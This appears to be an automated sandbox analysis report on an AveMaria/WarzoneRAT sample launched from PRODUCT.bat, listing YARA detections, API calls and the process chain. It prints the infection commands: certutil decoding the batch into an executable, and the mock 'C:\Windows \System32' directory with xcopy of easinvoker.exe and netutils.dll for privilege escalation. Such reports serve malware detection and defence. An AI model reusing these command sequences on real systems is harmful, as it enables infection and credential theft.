Source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 29.2.dbkyovyK.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0000000E.00000001.1696850208.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000008.00000003.1696692635.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0000000E.00000003.1719205642.000000002FDE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC

Source: truesight.sys.8.dr	Binary string: \Device\Driver\
Source: truesight.sys.8.dr	Binary string: \Device\TrueSight

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winBAT@48/13@3/3

Source: C:\Users\Public\pointer.com

Code function: 8_2_02D3344C GetLastError,FormatMessageA,

8_2_02D3344C

Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_004132F4 Sleep,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,		14_2_004132F4
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_004132F4 Sleep,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,		25_1_004132F4

Source: C:\Users\Public\pointer.com

Code function: 8_2_02D18F66 GetDiskFreeSpaceA,

8_2_02D18F66

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_004160C3 RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

14_2_004160C3

Source: C:\Users\Public\pointer.com

Code function: 8_2_02D2EFA4 CoCreateInstance,

8_2_02D2EFA4

Source: C:\Users\Public\pointer.com

Code function: 8_2_02D2A2F8 FreeResource,

8_2_02D2A2F8

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_00410DF8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

14_2_00410DF8

Source: C:\Users\Public\Libraries\dbkyovyK.pif

File created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\Public\pointer.com

Jump to behavior

Source: C:\Users\Public\Libraries\dbkyovyK.pif	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2120:120:WilError_03

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PRODUCT.bat" "

Source: C:\Users\Public\pointer.com	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\pointer.com	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\certutil.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PRODUCT.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c del "C:\Users\Public\pointer.com" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -decodehex "C:\Users\user\Desktop\PRODUCT.bat" "C:\Users\Public\pointer.com" 3
Source: C:\Windows\System32\certutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c PING -n 2 127.0.0.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c start C:\Users\Public\pointer.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\pointer.com C:\Users\Public\pointer.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0
Source: C:\Users\Public\pointer.com	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\KyvoykbdO.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\pointer.com	Process created: C:\Users\Public\Libraries\dbkyovyK.pif C:\Users\Public\Libraries\dbkyovyK.pif
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "x.bat" "C:\Windows \System32\" /K /D /H /Y
Source: unknown	Process created: C:\Users\Public\Libraries\Kyvoykbd.PIF "C:\Users\Public\Libraries\Kyvoykbd.PIF"
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Process created: C:\Users\Public\Libraries\dbkyovyK.pif C:\Users\Public\Libraries\dbkyovyK.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Kyvoykbd.PIF "C:\Users\Public\Libraries\Kyvoykbd.PIF"
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Process created: C:\Users\Public\Libraries\dbkyovyK.pif C:\Users\Public\Libraries\dbkyovyK.pif
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c del "C:\Users\Public\pointer.com" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -decodehex "C:\Users\user\Desktop\PRODUCT.bat" "C:\Users\Public\pointer.com" 3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c PING -n 2 127.0.0.1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c start C:\Users\Public\pointer.com	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\pointer.com C:\Users\Public\pointer.com	Jump to behavior
Source: C:\Users\Public\pointer.com	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\KyvoykbdO.bat" "	Jump to behavior
Source: C:\Users\Public\pointer.com	Process created: C:\Users\Public\Libraries\dbkyovyK.pif C:\Users\Public\Libraries\dbkyovyK.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "x.bat" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Process created: C:\Users\Public\Libraries\dbkyovyK.pif C:\Users\Public\Libraries\dbkyovyK.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Process created: C:\Users\Public\Libraries\dbkyovyK.pif C:\Users\Public\Libraries\dbkyovyK.pif	Jump to behavior

Source: C:\Users\Public\pointer.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: PRODUCT.bat

Static file information: File size 2701509 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr
Source:	Binary string: easinvoker.pdb source: pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, easinvoker.exe.8.dr
Source:	Binary string: easinvoker.pdbH source: pointer.com, 00000008.00000003.1692645825.0000000012431000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, easinvoker.exe.8.dr
Source:	Binary string: wuser32.pdb source: dbkyovyK.pif, dbkyovyK.pif, 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2906644486.00000000374A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wuser32.pdbUGP source: dbkyovyK.pif, 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2906644486.00000000374A3000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\dbkyovyK.pif	Unpacked PE file: 14.2.dbkyovyK.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;.bss:R;
